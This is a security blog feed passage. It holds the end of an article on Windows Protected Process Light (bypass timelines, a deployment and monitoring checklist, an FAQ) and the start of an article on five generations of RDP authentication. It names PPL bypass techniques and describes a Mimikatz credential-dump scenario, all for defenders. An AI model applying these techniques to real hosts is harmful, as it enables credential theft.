&lt;p&gt;The operational consequence is direct. A published PPL bypass does not trigger an out-of-band patch. It is fixed on the next major-release cadence, sometimes faster if Microsoft has internal motivation. The disclosure-to-fix half-lives are public record:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bypass&lt;/th&gt;
&lt;th&gt;Disclosed&lt;/th&gt;
&lt;th&gt;Microsoft fix&lt;/th&gt;
&lt;th&gt;Disclosure-to-fix&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Forshaw 2018 JScript-into-PPL&lt;/td&gt;
&lt;td&gt;Oct 2018&lt;/td&gt;
&lt;td&gt;Apr 2018 (1803, pre-disclosure)&lt;/td&gt;
&lt;td&gt;~0 months (Microsoft fixed first)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;itm4n 2021 PPLdump (KnownDlls)&lt;/td&gt;
&lt;td&gt;Apr 2021&lt;/td&gt;
&lt;td&gt;Jul 2022 (build 19044.1826)&lt;/td&gt;
&lt;td&gt;~15 months&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Landau 2023 PPLFault (CI TOCTOU)&lt;/td&gt;
&lt;td&gt;Apr-Sep 2023&lt;/td&gt;
&lt;td&gt;Feb 2024 (GA)&lt;/td&gt;
&lt;td&gt;~5-11 months&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;itm4n 2024 BYOVDLL (KeyIso chain)&lt;/td&gt;
&lt;td&gt;Aug 2024&lt;/td&gt;
&lt;td&gt;none (open, CVE-by-CVE)&lt;/td&gt;
&lt;td&gt;open&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A correctly classified PPL bypass is fixed on the standard cumulative-update cadence, not out-of-band. The implication for defenders is operational: PPL is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Treat detection (Section 11) and the Credential Guard companion (Section 9) as load-bearing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The reader takeaway is the third Aha moment of the article. PPL is real, kernel-enforced, structurally elegant, and demonstrably effective against the threat it was designed for (administrator-from-user-mode reads of LSASS). It is also explicitly &lt;em&gt;not&lt;/em&gt; a security boundary per Microsoft&apos;s own published servicing policy, and that classification is the most important fact about it. Plan for bypasses. Stack with Credential Guard. Treat detection as primary, not secondary.&lt;/p&gt;
&lt;h2&gt;11. Practical Guide -- Configuring, Verifying, and Monitoring PPL&lt;/h2&gt;
&lt;p&gt;If you are deploying PPL on a corporate fleet, run this checklist. The order is deliberate: audit before enforce, verify before trust the verifier, and detect because no static control survives unmotivated.&lt;/p&gt;
&lt;h3&gt;Deploy&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Enable &lt;code&gt;AuditLevel = 8&lt;/code&gt; under &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; for two months [@learn-runasppl]. This is a &lt;em&gt;different&lt;/em&gt; registry hive from &lt;code&gt;RunAsPPL&lt;/code&gt; (which lives under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa&lt;/code&gt;); mixing the two values up is the most common Stage 0 deployment error (see §6). Collect CodeIntegrity events 3065 and 3066 to enumerate every LSASS plug-in that would fail enforcement (smart-card middleware, third-party CSPs, password-filter DLLs). Re-sign or replace the failing modules. Set &lt;code&gt;RunAsPPL = 1&lt;/code&gt; on Secure Boot-capable machines; the kernel automatically stores the policy in a UEFI variable. &lt;code&gt;RunAsPPL = 2&lt;/code&gt; (Win11 22H2+) is the softer option that omits the UEFI variable for environments requiring admin-removable protection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For third-party EDR, confirm the agent daemon runs at &lt;code&gt;PPL/Antimalware&lt;/code&gt; (signer rung 3, byte &lt;code&gt;0x31&lt;/code&gt;). Process Explorer exposes this via View -&amp;gt; Select Columns -&amp;gt; Protection. System Informer (the modern Process Hacker fork that itm4n recommends in his BYOVDLL writeup [@itm4n-ghost-part1]) shows the same field in its process list. If your EDR is &lt;em&gt;not&lt;/em&gt; running at &lt;code&gt;PPL/Antimalware&lt;/code&gt;, it does not have the kernel&apos;s protection against admin tampering even when its vendor claims &quot;protected&quot; in marketing material. Process Explorer&apos;s &quot;Protection&quot; column ships in the canonical Sysinternals distribution [@sysinternals-procexp]; it reads &lt;code&gt;EPROCESS.Protection&lt;/code&gt; via the &lt;code&gt;NtQueryInformationProcess&lt;/code&gt; entry point [@learn-ntqueryinfoproc], although the specific &lt;code&gt;ProcessProtectionInformation&lt;/code&gt; information-class value is not enumerated in the public Learn &lt;code&gt;PROCESSINFOCLASS&lt;/code&gt; table -- the value is community-documented from Windows headers and reverse engineering rather than from a Microsoft Learn API reference.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Verify&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On a host you suspect of misconfiguration, attach WinDbg to the kernel and run &lt;code&gt;!process 0 7 lsass.exe&lt;/code&gt;. The output includes the &lt;code&gt;_PS_PROTECTION&lt;/code&gt; byte. Decode it with the formula from §3 above: &lt;code&gt;((value &amp;amp; 0xF0) &amp;gt;&amp;gt; 4)&lt;/code&gt; is the signer rung; &lt;code&gt;value &amp;amp; 0x07&lt;/code&gt; is the type; &lt;code&gt;(value &amp;gt;&amp;gt; 3) &amp;amp; 1&lt;/code&gt; is the audit bit. A &lt;code&gt;RunAsPPL = 1&lt;/code&gt; host yields &lt;code&gt;0x41&lt;/code&gt; (PPL + Lsa). The Defender service yields &lt;code&gt;0x31&lt;/code&gt; (PPL + Antimalware). &lt;code&gt;csrss.exe&lt;/code&gt; yields &lt;code&gt;0x61&lt;/code&gt; (PPL + WinTcb). If &lt;code&gt;lsass.exe&lt;/code&gt; shows &lt;code&gt;0x00&lt;/code&gt;, the registry policy did not take effect on this boot.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{&lt;code&gt;function decode(b) {   const t = b &amp;amp; 0x07, a = (b &amp;gt;&amp;gt; 3) &amp;amp; 0x01, s = (b &amp;gt;&amp;gt; 4) &amp;amp; 0x0F;   const tn = [&apos;None&apos;, &apos;ProtectedLight&apos;, &apos;Protected&apos;];   const sn = [&apos;None&apos;,&apos;Authenticode&apos;,&apos;CodeGen&apos;,&apos;Antimalware&apos;,               &apos;Lsa&apos;,&apos;Windows&apos;,&apos;WinTcb&apos;,&apos;Max&apos;];   return &apos;0x&apos; + b.toString(16).padStart(2,&apos;0&apos;) + &apos; = &apos; +          (sn[s] || s) + &apos;-&apos; + (tn[t] || t) +          (a ? &apos; (Audit on)&apos; : &apos;&apos;); } // Three benchmark values you should be able to recognise by sight console.log(decode(0x31)); // MsMpEng.exe (Defender at PPL/Antimalware) console.log(decode(0x41)); // lsass.exe under RunAsPPL=1 console.log(decode(0x61)); // csrss.exe (PPL/WinTcb)&lt;/code&gt;}&lt;/p&gt;
&lt;h3&gt;Monitor&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The CodeIntegrity provider emits three event IDs that matter for PPL monitoring [@learn-runasppl]: | Event ID | Provider | What it tells you | |---|---|---| | 3033 | Microsoft-Windows-CodeIntegrity | Enforcement-mode: an image load was blocked for failing the signing-level requirement (PPL or otherwise) | | 3063 | Microsoft-Windows-CodeIntegrity | Enforcement-mode: LSASS plug-in failed the shared-section security requirement (complement of audit-mode event 3065) | | 3065 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the shared-section requirement | | 3066 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the Microsoft signing level requirement | Sysmon Event 10 (ProcessAccess) captures &lt;code&gt;OpenProcess&lt;/code&gt; denials with the requested access mask and is the cheapest detection for a Mimikatz-shaped attempt against an RunAsPPL-protected &lt;code&gt;lsass.exe&lt;/code&gt;. A burst of 3033 events showing &lt;code&gt;lsass.exe&lt;/code&gt; (or another PPL) attempting to load images that fail the signing-level requirement is the canonical signal that a PPL bypass attempt is under way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PPL prevents admin-from-user-mode reads of LSASS. Credential Guard prevents kernel-mode reads of the credentials themselves (and BYOVDLL-style execution at PPL/Lsa). Deploy both. itm4n&apos;s &quot;complementary&quot; framing in his RunAsPPL writeup [@itm4n-runasppl] is the right operational model. On Win11 22H2 and Windows Server 2025, Credential Guard is default-on for domain-joined non-DC systems with VBS-capable hardware [@learn-cg]; on older fleets, enable it explicitly via Group Policy or the Device Guard / Credential Guard configuration script. Always both -- either alone leaves a layer of the threat model uncovered.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you are an EDR vendor wanting your daemon to run at &lt;code&gt;PPL/Antimalware&lt;/code&gt;, the path is fixed [@learn-mvi] [@learn-am-services]: 1. Hold Microsoft Virus Initiative membership; maintain independent-lab certification (AV-Comparatives, AV-Test, SE Labs, MRG Effitas, SKD Labs, VB 100, West Coast Labs, AVLab Cybersecurity Foundation). 2. Author an ELAM driver with an embedded &lt;code&gt;&amp;lt;ELAM&amp;gt;&lt;/code&gt; resource section enumerating your user-mode binary signing-certificate hashes. 3. Submit the driver through WHQL for Microsoft co-signing. 4. Use Trusted Signing for your user-mode binaries. 5. Verify with Process Explorer that the service launches at &lt;code&gt;PPL/Antimalware&lt;/code&gt; after install.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Practitioners who follow the checklist still need to know the common misconceptions. The next section catalogues them.&lt;/p&gt;
&lt;h2&gt;12. FAQ -- Common Misconceptions&lt;/h2&gt;
&lt;p&gt;Seven questions practitioners ask after their first PPL deployment.&lt;/p&gt;

Yes for full-access termination via `OpenProcess(PROCESS_TERMINATE, ...)`; an admin without a higher signer rung cannot terminate a `PPL/Antimalware` daemon by a direct kill. No for legitimate uninstall: the vendor&apos;s MSI installer (or equivalent) typically signals the daemon to shut itself down through its own service-control path, which is gated by ACL and not by the PPL lattice. Operationally, expect administrators to be able to uninstall your EDR but not to terminate its main process from outside the vendor toolchain.

No. itm4n&apos;s verbatim warning is worth repeating [@itm4n-runasppl]: &quot;I noticed that this protection tends to be confused with Credential Guard, which is completely different.&quot; PPL protects `lsass.exe` *as a process* from admin-from-user-mode reads. Credential Guard moves the *credentials themselves* into VTL1 memory via VBS. PPL is a VTL0 user-mode lattice control. Credential Guard is a VTL0 / VTL1 hypervisor boundary. They stack; see Section 9 for the layering and Section 11 Item 5 for the deployment recommendation.

Because Microsoft has not classified PPL as a security boundary. The Windows Security Servicing Criteria define a security boundary as a logical separation between security domains at different levels of trust, and Microsoft&apos;s published enumeration excludes administrative-process-to-PPL from that list [@msrc-servicing] [@elastic-byovd-admin]. PPL is treated as a defense-in-depth feature. The operational implication is that PPL bypasses are fixed on the next major release cadence rather than out-of-band, with disclosure-to-fix half-lives ranging from approximately five to fifteen months historically (see Section 10 for the data).

Practically no for non-AV applications. The protected-process EKU OIDs are gated by Microsoft&apos;s certificate authorities; only the Antimalware rung admits third-party certificates, and admission is mediated by ELAM driver + Microsoft Virus Initiative membership [@learn-mvi]. Hobbyist tooling cannot opt in. There is no public path for a non-AV third-party application to claim a PPL rung. If your application requires PPL-style anti-tampering, the realistic options are (a) become an MVI member if your application is an AV/EDR, (b) use Process Mitigation Policies such as Code Integrity Guard for code-injection resistance, or (c) deploy your sensitive operations inside a separate Microsoft-signed service.

&quot;Protected service&quot; is informal terminology for a Windows service whose host process runs as a PPL, with the Service Control Manager configured to launch it at a specific signer rung. The deployment plumbing (SCM service configuration, service-DLL packaging, the signing of the host binary) is what makes a service &quot;protected.&quot; The PPL machinery is what makes the host process actually resistant to tampering. The two terms describe the same thing from different angles -- one from the SCM-management view, one from the kernel-access-check view.

Only if the smart-card middleware DLL is not signed at the LSA level (signer rung 4). Most major smart-card vendors have updated their middleware to be Microsoft-signed at the required level, but legacy or in-house middleware frequently fails enforcement. The recommended workflow is to run `AuditLevel = 8` for two months [@learn-runasppl], collect CodeIntegrity 3065 / 3066 events, enumerate the failing modules, re-sign or replace them, and only then switch to `RunAsPPL = 1`. Skipping the audit period is the single most common cause of authentication outages during LSA protection rollouts.

Because the threat model PPL answers is *administrator-from-user-mode*, not *administrator-from-kernel-mode*. PPL is a kernel-enforced gate in the access-check pipeline, but a kernel-mode driver that can write to `EPROCESS.Protection` can zero the byte and disable the gate for any process. The defense against the kernel-mode attacker is a different mechanism: VBS-isolated credentials in VTL1 (Credential Guard), with HVCI / kernel-mode integrity controls preventing arbitrary kernel-mode code from running in the first place. PPL stops one threat; Credential Guard stops the threat one rung up; and the two are intended to be deployed together (Section 9, Section 11 Item 5).
&lt;p&gt;The arc has run from a single Mimikatz error code to a kernel-enforced lattice, a third-party admission path mediated by ELAM and MVI, an arms race shaped by a single structural insight that the kernel verifies the channel and not the behaviour, and a stacked companion boundary that lives in VTL1 because VTL0 has run out of places to hide a key. PPL is not a security boundary. That classification is not a footnote; it is the most important fact about it, because it tells defenders that the mechanism is exactly as strong as the engineering velocity Microsoft chooses to invest. Deploy it. Stack it with Credential Guard. Monitor for the next bypass.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The kernel verifies the channel. It does not verify the behaviour. Every PPL bypass since 2018 has lived in that seam, every fix has narrowed the channel, and the seam survives because behaviour is, by Rice&apos;s theorem, structurally outside what static signature verification can reason about.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;protected-process-light-the-ppl-signer-hierarchy-from-wintcb-to-antimalware&quot; keyTerms={[
  { term: &quot;Protected Process Light (PPL)&quot;, definition: &quot;A kernel-enforced gating model decorating a process with a structured protection level (Type, Audit, Signer) and rejecting OpenProcess requests from callers below the target&apos;s signer rung.&quot; },
  { term: &quot;_PS_PROTECTION byte&quot;, definition: &quot;The EPROCESS field encoding Type (3 bits), Audit (1 bit), Signer (4 bits) in a single UCHAR; read on every NtOpenProcess.&quot; },
  { term: &quot;Signer rung&quot;, definition: &quot;The four-bit Signer field of _PS_PROTECTION naming the trust tier of a protected process; values include Authenticode, Antimalware, Lsa, Windows, and WinTcb.&quot; },
  { term: &quot;RunAsPPL&quot;, definition: &quot;The HKLM\SYSTEM\CurrentControlSet\Control\Lsa registry knob that launches lsass.exe at PPL/Lsa on the next boot; value 1 anchors the policy in a UEFI variable on Secure Boot machines.&quot; },
  { term: &quot;ELAM&quot;, definition: &quot;Early Launch Anti-Malware driver -- a Microsoft-certified kernel driver that enrolls a vendor&apos;s user-mode signing certificates at PPL/Antimalware via an embedded resource section.&quot; },
  { term: &quot;BYOVDLL&quot;, definition: &quot;Bring Your Own Vulnerable DLL -- a bypass class against signature-gated security mechanisms in which the attacker loads a legitimately signed but historically vulnerable binary and exploits the known vulnerability inside it.&quot; },
  { term: &quot;Credential Guard&quot;, definition: &quot;A VBS-based isolation mechanism that moves NTLM hashes, Kerberos TGT keys, and Cred Manager credentials out of lsass.exe and into LsaIso.exe in VTL1.&quot; },
  { term: &quot;Security boundary (MSRC)&quot;, definition: &quot;Per Microsoft&apos;s published servicing criteria, a logical separation between code and data of security domains at different trust levels; PPL is excluded from this list and treated as defense in depth.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>protected-process-light</category><category>lsass</category><category>credential-guard</category><category>kernel-security</category><category>edr</category><category>mimikatz</category><category>security-boundary</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>From Password-in-the-Pipe to Cloud-Issued Session: Twenty-Six Years of RDP Authentication</title><link>https://paragmali.com/blog/rdp-authentication-26-years/</link><guid isPermaLink="true">https://paragmali.com/blog/rdp-authentication-26-years/</guid><description>How five generations of Windows RDP authentication -- classic delegation, NLA via CredSSP, Restricted Admin, Remote Credential Guard, and PRT-over-RDP -- retreated from the 1998 design that gave attackers the keys to every target.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Remote Desktop Protocol** has spent twenty-six years retreating from one design decision: in 1998, &quot;the user&apos;s password becomes the target&apos;s credential.&quot; Five generations now coexist on a Windows estate. **Classic credential delegation** sends the user&apos;s NT one-way function into the target&apos;s `lsass.exe`. **Network Level Authentication via CredSSP** [@rdpbcgr-credssp] (Windows Vista, 2006) moves authentication before the session starts but still delivers credential material. **Restricted Admin mode** [@ms-adv-2871997] (Windows 8.1 / Server 2012 R2 RTM, October 17, 2013) stops delivering credentials and runs the user&apos;s session as the target&apos;s machine identity. **Remote Credential Guard** [@msl-rcg] (Windows 10 1607, August 2, 2016) forwards Kerberos operations back to the caller&apos;s `lsass.exe`, with VTL1 trustlet protection conditional on the caller having local Credential Guard enabled. **PRT-over-RDP** [@msl-prtrdp-mstsc] (October 11, 2022 cumulative updates) uses a Microsoft Entra ID Primary Refresh Token cookie scoped to the Conditional Access app `a4a365df-50f1-4397-bc59-1a1564b8bb9c`. **CVE-2018-0886** [@nvd-2018-0886] (CredSSP MITM) and **CVE-2019-0708** [@nvd-2019-0708] (BlueKeep, pre-auth channel-setup) are the canonical RDP CVEs. The residual classes are RBCD against `TERMSRV` [@shamir-wagging], PRT extraction at the session host [@mollema-prt2], and the architectural SYSTEM-on-target floor that no RDP mode can close.
&lt;h2&gt;1. Four sekurlsa Dumps, One Target&lt;/h2&gt;
&lt;p&gt;A red-team operator with &lt;code&gt;SYSTEM&lt;/code&gt; on a single Windows 11 25H2 host runs &lt;code&gt;mimikatz sekurlsa::logonpasswords&lt;/code&gt; four times in a row [@mimikatz-github]. Each time, a different user has just disconnected an RDP session. Each time, the dump looks different.&lt;/p&gt;
&lt;p&gt;The first dump shows the user&apos;s NT one-way function. The second dump shows the target machine&apos;s identity instead of the user&apos;s. The third dump shows the user&apos;s identity but no hash that can be replayed anywhere. The fourth dump shows no password-equivalent material for the user at all -- only a Primary Refresh Token bound to the target&apos;s own TPM.&lt;/p&gt;
&lt;p&gt;Four RDP sessions, one target, four entirely different post-exploitation pivots. The difference is not in what the attacker did. The difference is in which authentication mode the client negotiated before the session was established.&lt;/p&gt;
&lt;p&gt;This article is about those four modes -- classic, Restricted Admin, Remote Credential Guard, and PRT-over-RDP -- and the fifth (NLA via CredSSP) that sits underneath them all. It is the story of a twenty-six-year retreat from &quot;the user&apos;s password becomes the target&apos;s credential.&quot;&lt;/p&gt;
&lt;p&gt;The wire-protocol selectors are public, even if their names mostly are not. The &lt;code&gt;RDP_NEG_REQ&lt;/code&gt; structure [@rdpbcgr-negreq] sets &lt;code&gt;requestedProtocols&lt;/code&gt; to one of &lt;code&gt;PROTOCOL_RDP (0x00)&lt;/code&gt;, &lt;code&gt;PROTOCOL_SSL (0x01)&lt;/code&gt;, &lt;code&gt;PROTOCOL_HYBRID (0x02)&lt;/code&gt; for CredSSP-based NLA, &lt;code&gt;PROTOCOL_HYBRID_EX (0x08)&lt;/code&gt;, or &lt;code&gt;PROTOCOL_RDSAAD (0x10)&lt;/code&gt; for the Entra-based path. Inside &lt;code&gt;PROTOCOL_HYBRID&lt;/code&gt;, two &lt;code&gt;flags&lt;/code&gt; bits switch the sub-mode: &lt;code&gt;RESTRICTED_ADMIN_MODE_REQUIRED (0x01)&lt;/code&gt; and &lt;code&gt;REDIRECTED_AUTHENTICATION_MODE_REQUIRED (0x02)&lt;/code&gt;. Five wire-level paths. Five different answers to the same question: what does the target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; end up holding?&lt;/p&gt;
&lt;p&gt;The next twelve sections walk each mode end-to-end, the CVEs that broke each layer, the Microsoft Learn comparison matrix verbatim, the residual class that survives each generation, and the operational guide for the engineer who has to make these primitives interoperate on Monday morning. Before we can read the four dumps, we have to understand the one credential-delivery decision every later generation was built to correct. That decision shipped in 1998.&lt;/p&gt;
&lt;h2&gt;2. Terminal Services and the Password-in-the-Pipe Era (1998-2005)&lt;/h2&gt;
&lt;p&gt;In 1998 Microsoft shipped a remote-display product that solved an obvious problem -- run a Windows desktop over the network -- and a second, less obvious problem along the way: every machine that accepted an RDP connection now needed to be a credential reservoir for every user who connected to it.&lt;/p&gt;
&lt;p&gt;The product was Windows NT 4.0 Terminal Server Edition [@wiki-nt4tse], built on top of MultiWin technology that Microsoft had licensed from Citrix the previous year [@wiki-rdp]. The protocol that carried the display and the keystrokes was the Remote Desktop Protocol, version 4.0, listening on TCP port 3389 (and, much later, UDP port 3389 for the QUIC variant) [@wiki-rdp]. The protocol itself was an extension of the ITU-T T.128 application-sharing protocol [@wiki-rdp], with RC4 channel encryption layered on top using a 40-bit, 56-bit, or 128-bit session key (a FIPS-validated 3DES variant was added in Server 2003) [@rdpbcgr-index].&lt;/p&gt;

timeline
    title Twenty-six years of RDP authentication
    1998 : NT 4.0 Terminal Server Edition / RDP 4.0
         : Password delivered to target&apos;s lsass
    2001 : SMBRelay (cDc) names credential-in-motion attack
    2006 : Windows Vista / RDP 6.0 ships NLA via CredSSP
    2013 : Windows 8.1 / 2012 R2 ships Restricted Admin
    2014 : KB2871997 backports Restricted Admin to Win 7
    2016 : Windows 10 1607 / 2016 ships Remote Credential Guard
    2018 : CVE-2018-0886 CredSSP RCE; AllowEncryptionOracle
    2019 : CVE-2019-0708 BlueKeep pre-auth channel-setup RCE
    2022 : KB5018418 ships PRT-over-RDP / Entra SSO for RDP
    2025 : Win 11 24H2 KIR recovers from RDP-stack regression

Microsoft&apos;s multi-user remote-desktop subsystem, introduced in Windows NT 4.0 Terminal Server Edition (1998) [@wiki-rdp]. Renamed to Remote Desktop Services in Windows Server 2008 R2. Provides interactive Windows sessions over TCP/3389 using the Remote Desktop Protocol, an extension of the ITU-T T.128 application-sharing protocol family.
&lt;p&gt;Authentication, in 1998, looked nothing like authentication today. The client opened a TCP/3389 connection. The server sent a Proprietary Certificate containing an RSA public key. The client generated a 32-byte Client Random, encrypted it with that RSA public key, and both sides derived RC4 session keys from the shared random [@rdpbcgr-index].&lt;/p&gt;
&lt;p&gt;The user then typed a username and password into the remote login screen, and the password traveled into the target&apos;s &lt;code&gt;Winlogon&lt;/code&gt; process inside that RC4 channel. The target&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; ran NTLM challenge-response against a domain controller (or against its local SAM) and, on success, materialised an interactive session for the user. The target now held the user&apos;s NT one-way function for the lifetime of that session.&lt;/p&gt;
&lt;p&gt;The architectural property was simple: the target was the credential reservoir. Five accounting clerks who RDP&apos;d into a Terminal Server during a shift left five NT-OWF entries in that host&apos;s &lt;code&gt;lsass.exe&lt;/code&gt; memory. An attacker who later got &lt;code&gt;SYSTEM&lt;/code&gt; on the Terminal Server held the credential material for all five.&lt;/p&gt;
&lt;p&gt;Two years later, Windows 2000 made Terminal Services a built-in server feature, and Windows XP Professional (October 2001) shipped the desktop-side variant under the brand &quot;Remote Desktop&quot; [@wiki-rdp]. The credential-aggregation surface, previously confined to dedicated Terminal Server hosts, now extended to every workstation in the estate.&lt;/p&gt;
&lt;p&gt;The first public articulation that &lt;em&gt;credential material in motion is itself an attack surface&lt;/em&gt; came on March 31, 2001, when Sir Dystic of Cult of the Dead Cow released SMBRelay at the &lt;code&gt;@lanta.con&lt;/code&gt; convention in Atlanta [@cdc-smbrelay]. SMBRelay was an SMB man-in-the-middle that hijacked an inbound NTLM authentication and relayed it onward.The Wikipedia SMBRelay article gives March 21, 2001 [@wiki-smbrelay], but the primary source -- Sir Dystic&apos;s own publication at cultdeadcow.com -- says March 31, 2001 [@cdc-smbrelay]. Primary-source dating wins. The Wikipedia article also says &quot;receives a connection on UDP port 139,&quot; which is incorrect; NetBIOS Session Service has always run over TCP/139, and the SMBRelay v0.98 source listing on cultdeadcow.com explicitly binds a TCP socket to port 139. RDP was not yet a direct target, but the principle was now public: pass-the-hash and credential relay would work against any protocol that put credential material on the wire.&lt;/p&gt;
&lt;p&gt;RDP 5.2 (Server 2003, XP SP2) responded to the wire-confidentiality problem in 2003 by adding an optional &lt;code&gt;Security Layer = SSL&lt;/code&gt; setting that wrapped the RDP traffic in TLS [@rdpbcgr-index]. The header byte called &lt;code&gt;selectedProtocol&lt;/code&gt; could now take the value &lt;code&gt;PROTOCOL_SSL = 0x01&lt;/code&gt;, meaning the channel was TLS-encrypted before the legacy basic-settings exchange ran. TLS solved the wire-snooping problem.&quot;Security Layer = SSL&quot; in RDP 5.2 was &lt;em&gt;transport confidentiality only&lt;/em&gt;. The TLS handshake authenticated the server&apos;s certificate (or did not, in many production configurations); the user authentication still happened later, inside the basic-settings exchange and the &lt;code&gt;Logon_Info&lt;/code&gt; PDU. The credential the target ended up with was identical to classic-RDP credential delivery. The distinction between &quot;TLS protects the wire&quot; and &quot;TLS protects the credential&quot; is the load-bearing precision the next section will need. It did not solve the credential-aggregation problem.&lt;/p&gt;
&lt;p&gt;By 2005 the architectural problem was named. Microsoft&apos;s eventual response would shape the next two decades of Windows authentication strategy. It would also, on its first attempt, fix the wrong half of the problem.&lt;/p&gt;
&lt;h2&gt;3. Network Level Authentication via CredSSP (2006-2013)&lt;/h2&gt;
&lt;p&gt;Network Level Authentication is the policy that requires authentication before the RDP session is established. NLA is not a protocol. NLA is implemented by CredSSP -- the Credential Security Support Provider -- running over TLS [@rdpbcgr-credssp]. The difference between those two sentences is the one that matters.&lt;/p&gt;
&lt;p&gt;Windows Vista (November 2006) shipped RDP 6.0, the first Windows release to include NLA and CredSSP support. NLA was selectable in System Properties but did not become the Remote Desktop default until Windows 7 / Server 2008 R2 [@wiki-rdp]. The MS-CSSP open specification documents CredSSP&apos;s role and its lineage, with the protocol summary listing its first revision in December 2006 [@mscssp-index] -- the same shipping window as Vista.&lt;/p&gt;
&lt;p&gt;MS-CSSP defines CredSSP as a protocol that &quot;enables an application to securely delegate a user&apos;s credentials from a client to a target server&quot; [@mscssp-index]. That phrasing matters: from CredSSP&apos;s own design statement, the credential is delegated &lt;em&gt;to&lt;/em&gt; the target. The credential still ends up on the target. The protocol design did not change that property; it changed &lt;em&gt;when&lt;/em&gt; the delivery happens and &lt;em&gt;what&lt;/em&gt; protects it on the wire.&lt;/p&gt;

A policy on the RDP server that requires the connecting user to authenticate before the RDP session is established (before the basic-settings exchange and the virtual-channel binding). Implemented by CredSSP over TLS [@rdpbcgr-credssp]. NLA reduces denial-of-service exposure and gates the pre-auth channel-setup attack surface (the failure mode BlueKeep would later exploit) but does not change the credential material the target receives.

The Microsoft authentication protocol, specified in MS-CSSP [@mscssp-index] and used by RDP and Windows Remote Management, that &quot;amalgamates&quot; TLS with Kerberos and NT LAN Manager [@rdpbcgr-credssp]. CredSSP runs SPNEGO inside a TLS channel, performs Kerberos or NTLM authentication inside SPNEGO, and finally delivers a `TSCredentials` payload to the target. CredSSP is what NLA *is*, at the wire.

The CredSSP payload structure that carries the user&apos;s credential material to the target after the SPNEGO and Kerberos/NTLM phases complete [@mscssp-index]. The classic form is `TSPasswordCreds` (username + domain + plaintext password). Two later forms -- the credential-less form for Restricted Admin and the redirected form (`TSRemoteGuardCreds`) for Remote Credential Guard -- change what travels in this slot without changing the surrounding exchange.
&lt;p&gt;The wire choreography is documented verbatim in section 5.4.5.2 of MS-RDPBCGR. CredSSP is &quot;essentially the amalgamation of TLS with Kerberos and NT LAN Manager (NTLM)&quot; [@rdpbcgr-credssp]. The exchange runs in this order:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Client opens TCP/3389.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;RDP_NEG_REQ&lt;/code&gt; carries &lt;code&gt;requestedProtocols &amp;amp; PROTOCOL_HYBRID = 0x02&lt;/code&gt; (or &lt;code&gt;PROTOCOL_HYBRID_EX = 0x08&lt;/code&gt;, which adds an Early User Authorization Result PDU) [@rdpbcgr-negreq].&lt;/li&gt;
&lt;li&gt;TLS handshake completes inside the RDP transport.&lt;/li&gt;
&lt;li&gt;SPNEGO negotiates Kerberos or NTLM inside the TLS channel.&lt;/li&gt;
&lt;li&gt;Kerberos or NTLM authenticates the user (and, for Kerberos, the server as well).&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;TSCredentials&lt;/code&gt; payload is sent to the target inside the still-open TLS channel. &quot;Once Kerberos or NTLM has completed successfully, the user&apos;s credentials are sent to the server&quot; [@rdpbcgr-credssp].&lt;/li&gt;
&lt;li&gt;The RDP basic-settings exchange and virtual-channel binding proceed.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    autonumber
    participant C as Client (mstsc.exe)
    participant T as Target (lsass.exe + termsrv)
    participant K as KDC / domain controller
    C-&amp;gt;&amp;gt;T: TCP/3389 + RDP_NEG_REQ (PROTOCOL_HYBRID 0x02)
    T--&amp;gt;&amp;gt;C: RDP_NEG_RSP (PROTOCOL_HYBRID selected)
    C-&amp;gt;&amp;gt;T: TLS Client Hello
    T--&amp;gt;&amp;gt;C: TLS Server Hello + cert chain
    C-&amp;gt;&amp;gt;T: SPNEGO NegTokenInit inside TLS
    C-&amp;gt;&amp;gt;K: AS-REQ / TGS-REQ for target SPN
    K--&amp;gt;&amp;gt;C: AS-REP / TGS-REP
    C-&amp;gt;&amp;gt;T: AP-REQ inside SPNEGO inside TLS
    T--&amp;gt;&amp;gt;C: AP-REP (mutual auth)
